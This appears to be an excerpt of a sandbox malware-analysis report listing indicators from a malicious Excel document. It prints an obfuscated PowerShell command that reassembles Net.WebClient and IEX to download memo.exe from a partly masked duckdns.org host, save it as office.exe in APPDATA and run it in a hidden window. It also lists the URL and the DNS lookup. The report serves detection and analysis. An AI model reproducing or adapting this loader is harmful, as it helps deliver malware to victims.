Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $G1='()EX'.replace('()','I'); sal Bo $G1;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''http://al#####tin.duckdns.org/og/memo.exe'',$env:APPDATA+''\''+''office.exe''...
- http://al#####tin.duckdns.org/og/memo.exe
- DNS ASK al#####tin.duckdns.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $G1='()EX'.replace('()','I'); sal Bo $G1;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''http://al#####tin.duckdns.org/og/memo.exe'',$env:APPDATA+''\''+''office.exe''...' (with hidden window)
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding